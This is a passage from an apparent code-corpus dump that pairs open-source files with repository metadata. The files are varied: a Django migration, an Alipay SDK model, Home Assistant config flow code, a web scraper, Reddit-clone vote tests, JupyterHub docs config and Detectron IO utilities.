assert resp.data == b'Hello'
| [
"hansroh@gmail.com"
] | hansroh@gmail.com |
acf0b8131f06d50afc7b3cb0f11b74a4e2b1a554 | 5d61565651b7ba5fa8fade3313a5e82fca8b6686 | /interface/migrations/0002_prjcheck_fpic.py | 546e9fd2488175f24de03e710e76989c914de9ef | [] | no_license | lonelyxmas/ISMS | d597b00072bfa77907875f575b866fbb1fb53295 | 08c5e2f3518fc639cf1a1f2869f4b2f3ae58e306 | refs/heads/master | 2023-08-14T12:02:59.001215 | 2021-03-22T03:34:58 | 2021-03-22T03:34:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | # Generated by Django 2.1.4 on 2019-12-27 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('interface', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='prjcheck',
name='FPic',
field=models.ImageField(blank=True, default='', null=True, upload_to='itemcheckpic/', verbose_name='检查图片'),
),
]
| [
"11325818@qq.com"
] | 11325818@qq.com |
91ff036f6c97b605a72a9b5abf1bbfc31a53e774 | c18ba3fe85ae03f084bd2fef2eb4abf83ca41fd1 | /ptp/wikidata.py | 5c413f80db2e9600537f1a8c0a17f598a1d6d0f5 | [
"Apache-2.0"
] | permissive | MusaabKh/ProceedingsTitleParser | 9f68d11d02193f817a0db830f124de2a68a721e1 | b48832e9032e41785f61338f6ff2f5cac91aba0e | refs/heads/master | 2023-02-24T20:08:23.096893 | 2021-01-31T09:36:26 | 2021-01-31T09:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,035 | py | '''
Created on 2020-07-11
@author: wf
'''
import os
from ptp.titleparser import TitleParser
from ptp.event import EventManager, Event
class WikiData(object):
'''
WikiData proceedings titles event source
'''
defaultEndpoint="https://query.wikidata.org/sparql"
def __init__(self, config=None):
'''
Constructor
Args:
config(StorageConfig): the storage configuration to use
'''
self.em=EventManager('wikidata',url='https://www.wikidata.org/wiki/Wikidata:Main_Page',title='Wikidata',config=config)
self.debug=self.em.config.debug
self.profile=self.em.config.profile
path=os.path.dirname(__file__)
self.sampledir=path+"/../sampledata/"
self.sampleFilePath=self.sampledir+"proceedings-wikidata.txt"
def cacheEvents(self,limit=1000000,batchSize=500):
'''
initialize me from my sample file
Args:
limit(int): the maximum number of events to cache
batchSize(int): the batchSize to use
'''
tp=TitleParser.getDefault(self.em.name)
tp.fromFile(self.sampleFilePath, "wikidata")
tc,errs,result=tp.parseAll()
if self.debug:
print(tc)
print("%d errs %d titles" % (len(errs),len(result)))
for title in result:
if 'acronym' in title.metadata():
if self.debug:
print(title.metadata())
if 'eventId' in title.info:
event=Event()
event.fromTitle(title,self.debug)
event.eventId=event.eventId.replace("http://www.wikidata.org/entity/","")
event.url="%s" % (title.info['eventId'])
self.em.add(event)
self.em.store(limit=limit,batchSize=batchSize)
def initEventManager(self):
''' init my event manager '''
if not self.em.isCached():
self.cacheEvents()
else:
self.em.fromStore()
self.em.extractCheckedAcronyms()
| [
"wf@bitplan.com"
] | wf@bitplan.com |
3d9b3e3a8e24455f1d17ac7a5e2af516ed052473 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayOpenMiniWidgetDataSyncModel.py | 7686d4a08b1e579200406d13612fb354366b681e | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 4,131 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.WidgetActivityInfo import WidgetActivityInfo
from alipay.aop.api.domain.WidgetGoodsInfo import WidgetGoodsInfo
class AlipayOpenMiniWidgetDataSyncModel(object):
def __init__(self):
self._activity_list = None
self._data_type = None
self._goods_list = None
self._mini_app_id = None
self._pid = None
@property
def activity_list(self):
return self._activity_list
@activity_list.setter
def activity_list(self, value):
if isinstance(value, list):
self._activity_list = list()
for i in value:
if isinstance(i, WidgetActivityInfo):
self._activity_list.append(i)
else:
self._activity_list.append(WidgetActivityInfo.from_alipay_dict(i))
@property
def data_type(self):
return self._data_type
@data_type.setter
def data_type(self, value):
self._data_type = value
@property
def goods_list(self):
return self._goods_list
@goods_list.setter
def goods_list(self, value):
if isinstance(value, list):
self._goods_list = list()
for i in value:
if isinstance(i, WidgetGoodsInfo):
self._goods_list.append(i)
else:
self._goods_list.append(WidgetGoodsInfo.from_alipay_dict(i))
@property
def mini_app_id(self):
return self._mini_app_id
@mini_app_id.setter
def mini_app_id(self, value):
self._mini_app_id = value
@property
def pid(self):
return self._pid
@pid.setter
def pid(self, value):
self._pid = value
def to_alipay_dict(self):
params = dict()
if self.activity_list:
if isinstance(self.activity_list, list):
for i in range(0, len(self.activity_list)):
element = self.activity_list[i]
if hasattr(element, 'to_alipay_dict'):
self.activity_list[i] = element.to_alipay_dict()
if hasattr(self.activity_list, 'to_alipay_dict'):
params['activity_list'] = self.activity_list.to_alipay_dict()
else:
params['activity_list'] = self.activity_list
if self.data_type:
if hasattr(self.data_type, 'to_alipay_dict'):
params['data_type'] = self.data_type.to_alipay_dict()
else:
params['data_type'] = self.data_type
if self.goods_list:
if isinstance(self.goods_list, list):
for i in range(0, len(self.goods_list)):
element = self.goods_list[i]
if hasattr(element, 'to_alipay_dict'):
self.goods_list[i] = element.to_alipay_dict()
if hasattr(self.goods_list, 'to_alipay_dict'):
params['goods_list'] = self.goods_list.to_alipay_dict()
else:
params['goods_list'] = self.goods_list
if self.mini_app_id:
if hasattr(self.mini_app_id, 'to_alipay_dict'):
params['mini_app_id'] = self.mini_app_id.to_alipay_dict()
else:
params['mini_app_id'] = self.mini_app_id
if self.pid:
if hasattr(self.pid, 'to_alipay_dict'):
params['pid'] = self.pid.to_alipay_dict()
else:
params['pid'] = self.pid
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenMiniWidgetDataSyncModel()
if 'activity_list' in d:
o.activity_list = d['activity_list']
if 'data_type' in d:
o.data_type = d['data_type']
if 'goods_list' in d:
o.goods_list = d['goods_list']
if 'mini_app_id' in d:
o.mini_app_id = d['mini_app_id']
if 'pid' in d:
o.pid = d['pid']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
757fa10fa71cf83c4ddce1e7fe97f57729e28263 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02258/s174082799.py | ec4c268e53e6fd615b4b7d4c2cbd623cf2fc2291 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | n = int(input())
a = []
for i in range(n):
a.append(int(input()))
maxv = -(10**9)
mina = a[0]
for i in range(1,n):
maxv = max(maxv, a[i]-mina)
mina = min(mina, a[i])
print(maxv) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fce5b5f2ed42e0117e781fb4e217c76333570e72 | 8bda8911512f1c454f5e75ef36f3d828661b1479 | /math_03/test04.py | 825c4353a53aea3c85d7334e46178e3e6b4ea99a | [] | no_license | choijaehoon1/backjoon | 0f5909a1e1d416f8f431d6b986754af7eb6a3396 | a0411dba08c057a312733e38683246162256e61d | refs/heads/master | 2023-02-26T12:28:33.733297 | 2021-02-05T13:28:33 | 2021-02-05T13:28:33 | 280,430,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import math
a,b = map(int,input().split())
gcd = math.gcd(a,b)
tmp_a = a // gcd
tmp_b = b // gcd
result = tmp_a * tmp_b * gcd
print(gcd)
print(result)
| [
"wogns_20@naver.com"
] | wogns_20@naver.com |
a4965ebdbf2345026b3cf7f906d6d34263e5a778 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/modem_callerid/config_flow.py | 2bc857a16f43a79d68aca1bd9f922d9893d43e62 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 4,450 | py | """Config flow for Modem Caller ID integration."""
from __future__ import annotations
from typing import Any
from phone_modem import PhoneModem
import serial.tools.list_ports
from serial.tools.list_ports_common import ListPortInfo
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import usb
from homeassistant.const import CONF_DEVICE, CONF_NAME
from homeassistant.data_entry_flow import FlowResult
from .const import DEFAULT_NAME, DOMAIN, EXCEPTIONS
DATA_SCHEMA = vol.Schema({"name": str, "device": str})
def _generate_unique_id(port: ListPortInfo) -> str:
"""Generate unique id from usb attributes."""
return f"{port.vid}:{port.pid}_{port.serial_number}_{port.manufacturer}_{port.description}"
class PhoneModemFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for Phone Modem."""
def __init__(self) -> None:
"""Set up flow instance."""
self._device: str | None = None
async def async_step_usb(self, discovery_info: usb.UsbServiceInfo) -> FlowResult:
"""Handle USB Discovery."""
device = discovery_info.device
dev_path = await self.hass.async_add_executor_job(usb.get_serial_by_id, device)
unique_id = f"{discovery_info.vid}:{discovery_info.pid}_{discovery_info.serial_number}_{discovery_info.manufacturer}_{discovery_info.description}"
if (
await self.validate_device_errors(dev_path=dev_path, unique_id=unique_id)
is None
):
self._device = dev_path
return await self.async_step_usb_confirm()
return self.async_abort(reason="cannot_connect")
async def async_step_usb_confirm(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle USB Discovery confirmation."""
if user_input is not None:
return self.async_create_entry(
title=user_input.get(CONF_NAME, DEFAULT_NAME),
data={CONF_DEVICE: self._device},
)
self._set_confirm_only()
return self.async_show_form(step_id="usb_confirm")
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a flow initiated by the user."""
errors: dict[str, str] | None = {}
if self._async_in_progress():
return self.async_abort(reason="already_in_progress")
ports = await self.hass.async_add_executor_job(serial.tools.list_ports.comports)
existing_devices = [
entry.data[CONF_DEVICE] for entry in self._async_current_entries()
]
unused_ports = [
usb.human_readable_device_name(
port.device,
port.serial_number,
port.manufacturer,
port.description,
port.vid,
port.pid,
)
for port in ports
if port.device not in existing_devices
]
if not unused_ports:
return self.async_abort(reason="no_devices_found")
if user_input is not None:
port = ports[unused_ports.index(str(user_input.get(CONF_DEVICE)))]
dev_path = await self.hass.async_add_executor_job(
usb.get_serial_by_id, port.device
)
errors = await self.validate_device_errors(
dev_path=dev_path, unique_id=_generate_unique_id(port)
)
if errors is None:
return self.async_create_entry(
title=user_input.get(CONF_NAME, DEFAULT_NAME),
data={CONF_DEVICE: dev_path},
)
user_input = user_input or {}
schema = vol.Schema({vol.Required(CONF_DEVICE): vol.In(unused_ports)})
return self.async_show_form(step_id="user", data_schema=schema, errors=errors)
async def validate_device_errors(
self, dev_path: str, unique_id: str
) -> dict[str, str] | None:
"""Handle common flow input validation."""
self._async_abort_entries_match({CONF_DEVICE: dev_path})
await self.async_set_unique_id(unique_id)
self._abort_if_unique_id_configured(updates={CONF_DEVICE: dev_path})
try:
api = PhoneModem()
await api.test(dev_path)
except EXCEPTIONS:
return {"base": "cannot_connect"}
else:
return None
| [
"noreply@github.com"
] | Adminiuga.noreply@github.com |
9701179c2d1d86e8d46e81423ada9305f0e75887 | 657bad752fd4603b5c5e44a59aa6a2210d343bf0 | /huxiu/huxiu/test.py | bf7fcfcd9022935eef9a3881692284db3b55938d | [] | no_license | PurpleBreeze0322/web-scraping-cases | 0ed1a6f611289898004d07ef409d783c5ca25898 | 8b8c8c15671f2c0e7283d2e6428d44786478fede | refs/heads/master | 2021-05-22T13:57:40.849489 | 2018-09-30T14:25:15 | 2018-09-30T14:25:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
headers = {
"Accept-Encoding":"gzip, deflate",
"Accept-Language":"zh-CN, zh;q=0.8",
"Connection":"keep-alive",
"Host":"img.titan007.com",
"Referer":"http://zq.win007.com/cn/CupMatch/2018/75.html",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
}
driver = webdriver.PhantomJS(executable_path=r'D:\03-CS\plantomJS\phantomjs-2.1.1-windows\bin\phantomjs')
driver.get('http://zq.win007.com/cn/CupMatch/75.html' )
try:
element = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH, '//*[@id="ScoreGroupDiv"][@style="display: block;"]')))
finally:
print(driver.page_source)
driver.close() | [
"wuqili1025@gmail.com"
] | wuqili1025@gmail.com |
591f1ad12a3d97363911cc7e996a2fa9768a008f | 61a5e9adfcd292dcf06fceda993c0fbeb0b469cc | /alg/leetcode/b40combinenum2.py | 5361ab60cff911ae885e89c6bedebf9e12615f9b | [] | no_license | godspysonyou/everything | f76e0ade065601990ff5b449f8c5955ba3c07374 | 03c7ec9d9e5a802ffbc854a9f929ca770ae7add8 | refs/heads/master | 2020-03-20T23:34:50.812645 | 2019-04-21T13:16:58 | 2019-04-21T13:16:58 | 137,853,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | class Solution:
def __init__(self):
self.ret=[]
def DFS(self, candidates, target, start, valueslist):
length = len(candidates)
if target==0:
return self.ret.append(valueslist)
before = -1 # 设置before是为了避免这一层中有相同的初始, 如 1 1,将会产生,用 if i in list会更好
for i in range(start,length):
if target<candidates[i]:
return
if candidates[i]==before:
continue
before = candidates[i]
cantemp = candidates.copy()
cantemp.remove(candidates[i])
self.DFS(cantemp,target-candidates[i],i,valueslist+[candidates[i]])
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
candidates.sort()
self.DFS(candidates, target, 0, [])
return self.ret
if __name__ == '__main__':
l = [1]
t = 1
s = Solution()
print(s.combinationSum2(l, t)) | [
"1344094556@qq.com"
] | 1344094556@qq.com |
809de22e39392cd22203c2ab663bdb9e6901856d | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/jupyterhub_jupyterhub/jupyterhub-master/docs/source/conf.py | 83b19bab19ab399e13108106e184f1424fe934bd | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 5,011 | py | # -*- coding: utf-8 -*-
#
import sys
import os
import shlex
# For conversion from markdown to html
import recommonmark.parser
# Set paths
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# Minimal Sphinx version
needs_sphinx = '1.4'
# Sphinx extension modules
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.napoleon',
'autodoc_traits',
]
templates_path = ['_templates']
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'JupyterHub'
copyright = u'2016, Project Jupyter team'
author = u'Project Jupyter team'
# Autopopulate version
from os.path import dirname
docs = dirname(dirname(__file__))
root = dirname(docs)
sys.path.insert(0, root)
sys.path.insert(0, os.path.join(docs, 'sphinxext'))
import jupyterhub
# The short X.Y version.
version = '%i.%i' % jupyterhub.version_info[:2]
# The full version, including alpha/beta/rc tags.
release = jupyterhub.__version__
language = None
exclude_patterns = []
pygments_style = 'sphinx'
todo_include_todos = False
# Set the default role so we can use `foo` instead of ``foo``
default_role = 'literal'
# -- Source -------------------------------------------------------------
source_parsers = {
'.md': 'recommonmark.parser.CommonMarkParser',
}
source_suffix = ['.rst', '.md']
#source_encoding = 'utf-8-sig'
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages.
html_theme = 'sphinx_rtd_theme'
#html_theme_options = {}
#html_theme_path = []
#html_title = None
#html_short_title = None
#html_logo = None
#html_favicon = None
# Paths that contain custom static files (such as style sheets)
html_static_path = ['_static']
#html_extra_path = []
#html_last_updated_fmt = '%b %d, %Y'
#html_use_smartypants = True
#html_sidebars = {}
#html_additional_pages = {}
#html_domain_indices = True
#html_use_index = True
#html_split_index = False
#html_show_sourcelink = True
#html_show_sphinx = True
#html_show_copyright = True
#html_use_opensearch = ''
#html_file_suffix = None
#html_search_language = 'en'
#html_search_options = {'type': 'default'}
#html_search_scorer = 'scorer.js'
htmlhelp_basename = 'JupyterHubdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
#'papersize': 'letterpaper',
#'pointsize': '10pt',
#'preamble': '',
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'JupyterHub.tex', u'JupyterHub Documentation',
u'Project Jupyter team', 'manual'),
]
#latex_logo = None
#latex_use_parts = False
#latex_show_pagerefs = False
#latex_show_urls = False
#latex_appendices = []
#latex_domain_indices = True
# -- manual page output -------------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'jupyterhub', u'JupyterHub Documentation',
[author], 1)
]
#man_show_urls = False
# -- Texinfo output -----------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'JupyterHub', u'JupyterHub Documentation',
author, 'JupyterHub', 'One line description of project.',
'Miscellaneous'),
]
#texinfo_appendices = []
#texinfo_domain_indices = True
#texinfo_show_urls = 'footnote'
#texinfo_no_detailmenu = False
# -- Epub output --------------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Intersphinx ----------------------------------------------------------
intersphinx_mapping = {'https://docs.python.org/': None}
# -- Read The Docs --------------------------------------------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:
# only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
else:
# readthedocs.org uses their theme by default, so no need to specify it
# build rest-api, since RTD doesn't run make
from subprocess import check_call as sh
sh(['make', 'rest-api'], cwd=docs)
# -- Spell checking -------------------------------------------------------
try:
import sphinxcontrib.spelling
except ImportError:
pass
else:
extensions.append("sphinxcontrib.spelling")
spelling_word_list_filename='spelling_wordlist.txt'
| [
"659338505@qq.com"
] | 659338505@qq.com |
0166f5b538f4e262750f9bf67ddf7ea54da2b5de | 82b26633d243d27ad3f9920681095de3d88d0419 | /votes/tests.py | dd514d3dc0922c4080642323c39e4930ebf4862f | [] | no_license | ashishkharcheiuforks/reReddit_backend | f3cc0ffae234fecd4d04a8156bb2fea6e32aa23f | fbbc9d8977d7a996c41d92636034a50490b05c26 | refs/heads/master | 2021-04-23T20:20:32.029877 | 2019-03-25T22:17:46 | 2019-03-25T22:17:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,947 | py | from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.test import APIClient
from redditors.models import User, UserSubMembership
from subs.models import Sub
from posts.models import Post
from comments.models import Comment
from votes.models import CommentVote, PostVote
class VoteTestBase(APITestCase):
"""
There is a lot of setup necessary for testing votes.
This class will help get some of that out of the way
"""
def setUp(self):
self.subreddit = Sub.objects.create(
title='test_subreddit'
)
# two users are needed, one creates content, 'poster' the other
# votes on it 'voter'
self.poster_data = {
'username': 'test_username',
'email': 'test@gmail.com',
'password': 'test_password',
}
self.poster = User.objects.create(**self.poster_data)
self.voter_data = {
'username': 'test_username_2',
'email': 'test2@gmail.com',
'password': 'test_password',
}
self.voter = User.objects.create(**self.voter_data)
self.post = Post.objects.create(
title="test_post_title",
body="test_post_body",
subreddit=self.subreddit,
poster=self.poster
)
self.comment = Comment.objects.create(
body="test comment",
post=self.post,
parent=None,
poster=self.poster
)
self.client.force_login(self.voter)
self.vote_url = reverse('vote')
self.comment_vote_data = lambda vote_type : {
"item_fn": "t1_{}".format(self.comment.pk),
"vote_type": vote_type
}
self.post_vote_data = lambda vote_type : {
"item_fn": "t2_{}".format(self.post.pk),
"vote_type": vote_type
}
self.vote_data = lambda type, vote_type : {
"item_fn": "{}_{}".format(type, self.post.pk),
"vote_type": vote_type
}
self.class_type = {
"t1": CommentVote,
"t2": PostVote
}
class VoteViewTests(VoteTestBase):
"""
Testing vote creation and updating with requests
"""
def test_upvote(self):
"""
An authorized user can upvote on a comment and a post
"""
for key in self.class_type.keys():
response = self.client.post(self.vote_url, self.vote_data(key, 1))
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.class_type[key].objects.count(), 1)
self.assertEqual(self.class_type[key].objects.first().vote_type, 1)
def test_downvote(self):
"""
An authorized user can downvote on a comment and a post
"""
for key in self.class_type.keys():
response = self.client.post(self.vote_url, self.vote_data(key, -1))
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.class_type[key].objects.count(), 1)
self.assertEqual(self.class_type[key].objects.first().vote_type, -1)
def test_double_vote(self):
"""
A double vote updates the original vote to a non-vote
it does not add another vote instance to the database.
"""
vote_types = [1, -1]
for vote_type in vote_types:
for (key, class_name) in self.class_type.items():
response = self.client.post(
self.vote_url,
self.vote_data(key, vote_type)
)
response = self.client.post(
self.vote_url,
self.vote_data(key, vote_type)
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(class_name.objects.count(), 1)
self.assertEqual(
class_name.objects.first().vote_type,
0
)
# there is also a direct unvote option
for key in self.class_type.keys():
response = self.client.post(self.vote_url, self.vote_data(key, 1))
response = self.client.post(self.vote_url, self.vote_data(key, 0))
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.class_type[key].objects.count(), 1)
self.assertEqual(self.class_type[key].objects.first().vote_type, 0)
def test_unauthed_vote(self):
"""
An unauthed user can not vote
"""
self.client.logout()
for (key, class_name) in self.class_type.items():
response = self.client.post(self.vote_url, self.vote_data(key, 1))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(class_name.objects.count(), 0)
class VoteKarmaAddition(VoteTestBase):
"""
Post and comment Vote requests and their effect on the posters's
karma
"""
def test_comment_vote(self):
"""
When a comment is voted on the poster's karma should change
appropriately
"""
# make an upvote
original_karma = self.poster.karma
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# upvote again, that cancels original vote
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# make a downvote
response = self.client.post(self.vote_url, self.comment_vote_data(-1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, -1)
self.assertEqual(self.poster.karma, original_karma - 1)
# from downvote to upvote
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# test an unvote
response = self.client.post(self.vote_url, self.comment_vote_data(0))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# no change in karma on unauthed vote
self.client.logout()
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(CommentVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
def test_post_vote(self):
"""
When a post is voted on the poster's karma should change
appropriately
"""
# make an upvote
original_karma = self.poster.karma
response = self.client.post(self.vote_url, self.post_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# upvote again, that cancels original vote
response = self.client.post(self.vote_url, self.post_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# make a downvote
response = self.client.post(self.vote_url, self.post_vote_data(-1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, -1)
self.assertEqual(self.poster.karma, original_karma - 1)
# from downvote to upvote
response = self.client.post(self.vote_url, self.post_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# test an unvote
response = self.client.post(self.vote_url, self.post_vote_data(0))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# no change in karma on unauthed vote
self.client.logout()
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(PostVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
| [
"cdunn6754@gmail.com"
] | cdunn6754@gmail.com |
85550704eeeeb7250fd6c0029ac51c44c29bfa89 | 3d0f61f8bf2ad1ce503022c1c4c9ebe566d6040b | /detectron/utils/io.py | 0cb5e22c3c889728b88623f82840936dc5562504 | [
"MIT",
"Apache-2.0"
] | permissive | programmerjide/Detectron | 3410a812de62fc905860b3afde00f62c68a11c94 | da2441cd3a3d08f9aa1e51b0d05370bdc94bf98e | refs/heads/master | 2020-03-30T18:54:25.149074 | 2019-01-29T08:47:37 | 2019-01-29T08:47:37 | 151,519,747 | 0 | 0 | Apache-2.0 | 2018-10-04T04:45:54 | 2018-10-04T04:45:54 | null | UTF-8 | Python | false | false | 5,864 | py | # Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""IO utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hashlib
import logging
import os
import re
import six
import sys
from six.moves import cPickle as pickle
from six.moves import urllib
logger = logging.getLogger(__name__)
_DETECTRON_S3_BASE_URL = 'https://s3-us-west-2.amazonaws.com/detectron'
def save_object(obj, file_name, pickle_format=2):
"""Save a Python object by pickling it.
Unless specifically overridden, we want to save it in Pickle format=2 since this
will allow other Python2 executables to load the resulting Pickle. When we want
to completely remove Python2 backward-compatibility, we can bump it up to 3. We
should never use pickle.HIGHEST_PROTOCOL as far as possible if the resulting
file is manifested or used, external to the system.
"""
file_name = os.path.abspath(file_name)
with open(file_name, 'wb') as f:
pickle.dump(obj, f, pickle_format)
def load_object(file_name):
with open(file_name, 'rb') as f:
# The default encoding used while unpickling is 7-bit (ASCII.) However,
# the blobs are arbitrary 8-bit bytes which don't agree. The absolute
# correct way to do this is to use `encoding="bytes"` and then interpret
# the blob names either as ASCII, or better, as unicode utf-8. A
# reasonable fix, however, is to treat it the encoding as 8-bit latin1
# (which agrees with the first 256 characters of Unicode anyway.)
if six.PY2:
return pickle.load(f)
else:
return pickle.load(f, encoding='latin1')
def cache_url(url_or_file, cache_dir):
"""Download the file specified by the URL to the cache_dir and return the
path to the cached file. If the argument is not a URL, simply return it as
is.
"""
is_url = re.match(
r'^(?:http)s?://', url_or_file, re.IGNORECASE
) is not None
if not is_url:
return url_or_file
url = url_or_file
assert url.startswith(_DETECTRON_S3_BASE_URL), \
('Detectron only automatically caches URLs in the Detectron S3 '
'bucket: {}').format(_DETECTRON_S3_BASE_URL)
cache_file_path = url.replace(_DETECTRON_S3_BASE_URL, cache_dir)
if os.path.exists(cache_file_path):
assert_cache_file_is_ok(url, cache_file_path)
return cache_file_path
